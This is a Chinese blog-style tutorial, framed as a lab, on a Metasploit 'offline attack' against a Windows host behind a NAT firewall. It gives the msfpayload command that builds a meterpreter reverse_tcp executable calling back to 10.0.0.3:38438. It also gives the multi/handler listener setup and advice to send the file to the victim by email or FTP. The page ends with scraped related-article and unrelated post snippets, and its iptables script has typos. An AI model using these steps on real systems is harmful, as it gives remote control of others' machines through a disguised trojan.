MSF 离线攻击

MSF连环攻击在internet上实现是不太现实的,网络中的安全设备(防火墙、入侵检测、入侵防护系统)。

实验拓扑如下:

实验说明:安全实验中的包过滤防火墙在测试中使用的是linux iptables,上述拓扑中,攻击者的公网地址为61.67.1.100/24,而防火墙上的公网地址61.67.1.200/24 对内部主机192.168.1.0/24 做SNAT。

Linux iptables 策略如下:

#bin/bash

Fw=/sbin/iptables

$fw –P INPUT DROP

$fw –P FORWARD ACCEPT
$fw –P OUTPUT ACCEPT

echo 1
>/proc/sys/net/ipv4/ip_forward

$FW -t
nat -A POSTROUTING -o em1 -s 192.168.1.0/24 -j SNAT -to 61.67.1.200

Iptables-save

此时攻击者就无法主动发起TCP建立请求和位于防火墙后的服务器192.168.1.100/24建立连接,MSF连环攻击也就无法实现。因而在这种环境中需要使用MSF的离线攻击。

实现MSF离线攻击的步骤如下:

1、 
生成离线攻击脚本

#cd  /pentest/exploits/frameworks3

/pentest/exploits/frameworks3# ./msfpayload  windows/meterpreter/reverse_tcp
LHOST=10.0.0.3 LPORT=38438  X>/home/soft/msf38438.exe

说明:生成反向tcp连接脚本 服务器的IP为10.0.0.3
服务器使用的TCP端口为38438 生成的脚本存放的路径为/home/soft,文件名为 msf38438.exe

2、 
创建TCP反向连接服务

#msfconsole

msf>use exploit/multi/handler

msf exploit(handler)>set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(handler)>set LHOST 10.0.0.3

msf exploit(handler)>set PORT 38438

3、 启动服务

4、 
将生成的离线攻击包通过其他手段(邮件、FTP)等传送到受害者服务器,如下:

只要受害者服务器上该程序被执行即可。

5、 
在攻击者的服务器端查看连接

6、 
查看是否获取系统控制权

MSF 离线攻击的更多相关文章

  1. MSF连环攻击实验

    MSF连续攻击实验 一.实验拓扑 二.实验环境 Windows XP BT 5 32位 三.实验原理 通过扫描 XP主机,利用扫描出的漏洞建立 TCP会话,通过进程的提权,进一步获取目标机的控制权限 ...

  2. Kali密码攻击之——离线攻击工具

    在线密码攻击在渗透测试中很重要,但对于测试过程中得到的哈希,加密数据,又需要离线破解工具辅助解决 Creddump套件 kali下离线攻击工具中的Cache-dump,lsadump,pwdump,均 ...

  3. MSF基础攻击实践报告

    MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者 ...

  4. 利用MSF溢出攻击讲解

    msf的强大之处也就不做探讨了,虽然这些东西网上很多.但我想说说我的感受. 这次的演示是在BT5中远程攻击一台win2003 sp2 metasploit是4.3的 需要说明的一点是 现在的BT5中不 ...

  5. MSF MS11-050攻击实践及内存保护技术

    内存攻击指的是攻击者利用软件安全漏洞,构造恶意输入导致软件在处理输入数据时出现非预期错误,将输入数据写入内存中的某些特定敏感位置,从而劫持软件控制流,转而执行外部输入的指令代码,造成目标系统被获取远程 ...

  6. MSF漏洞攻击练习系统 – Metasploitable2

    Metasploitable2 是Metasploit团队维护的一个集成了各种漏洞弱点的Linux主机(ubuntu)镜像,方便广大黑扩跟安全人员进行MSF漏洞测试跟学习,免去搭建各种测试环境.VMw ...

  7. 利用MSF的MS08_067模块攻击windows server 2003 SP2中文版系统

    一.测试环境 攻击机:kali(NMAP+MSF) 靶机:windows server 2003 SP2 中文版 利用漏洞:MS08_067 二.漏洞描述 MS08-067漏洞的全称为“Windows ...

  8. 利用公网Msf+MS17010跨网段攻击内网

    其实很多小白在对利用msf进行ms17010攻击的时候总是不成功,其实这都是因为网上大部分的文章都是写的内网对内网(192.168.1.2-->192.168.1.3)这样的案例,今天写了一下利 ...

  9. msf入门学习笔记

    msf-------------------------------------- service postgresql startservice metasploit startmsfconsole ...

随机推荐

  1. 【FAQ】SpingMVC实现集合參数(Could not instantiate bean class [java.util.List])

    需求,要求批量新增或者改动一个List,在Spring MVC中是不支持以下代码的写法 @RequestMapping(value = "/update", method = Re ...

  2. HDU 4070 Phage War

    贪心,t 大的放到前面...因为感染所有cell需要的phage的总数是一定的,所以产生phage需要的时间是一定的,只需要考虑用来感染的时间,这样考虑的话,把 t 小的放后面的话,可以发现总时间的最 ...

  3. IOS 应用的架构解析

    首先新建一个IOS 的应用工程,主要讲解一下的文件组成: main.m XXXXDelegete.h\.m MainWindow.xib info.plist 文件 IOS 应用程序由UIKit 封装 ...

  4. 国际化之MessageFormat与占位符

    如果一个字符串文本中包含了多个与国际化相关的数据,可以使用MessageFormat类对这些数据进行批量处理. 例如: 在2016年1月9日的时候,一场台风导致了500间房屋的摧毁和¥1000000元 ...

  5. SetWindowLong

    SetWindowLong函数介绍 收藏 SetWindowLong函数介绍 SetWindowLong Unicode 函数原型 LONG SetWindowLong(hwnd,nIndex,lNe ...

  6. Html网页表格结构化标记的应用

    在讲网页表格的结构化标记之前,还是先看几幅图片. Html表格的结构化 所谓的结构化,正如上述第一副图所看到的,就是把我们的表格划分为三种:表头.表体.表尾.从而当我们在改动表体部分的时候,不会影响到 ...

  7. Linux系统管理员必备的监控工具(88款)

    随着互联网行业的不断发展,各种监控工具多得不可胜数.这里列出网上最全的监控工具.让你可以拥有超过80种方式来管理你的机器.在本文中,我们主要包括以下方面: 命令行工具 网络相关内容 系统相关的监控工具 ...

  8. 在界面线程不能使用Sleep和WaitForSingleObject之类的函数, 使用 MsgWaitForMultipleObjects

    http://blog.csdn.net/wishfly/article/details/3726985 你在主线程用了WaitForSingleObject,导致了消息循环的阻塞,界面假死. 然后在 ...

  9. 【老鸟学算法】包含 min函数的栈设计——java实现

    要求: 1. 定义栈的数据结构,要求添加一个 min函数,能够得到栈的最小元素. 2. 要求函数 min.push 以及 pop 的时间复杂度都是 O(1). 这是考验“栈”数据结构设计.众所周知,栈 ...

  10. eclipse Maven plugin 配置

    1. eclipse -> help -> marketpalce -> search 在输入框中输入Maven,回车. 在搜索结果列表中往下拉几个安装 Maven Integrat ...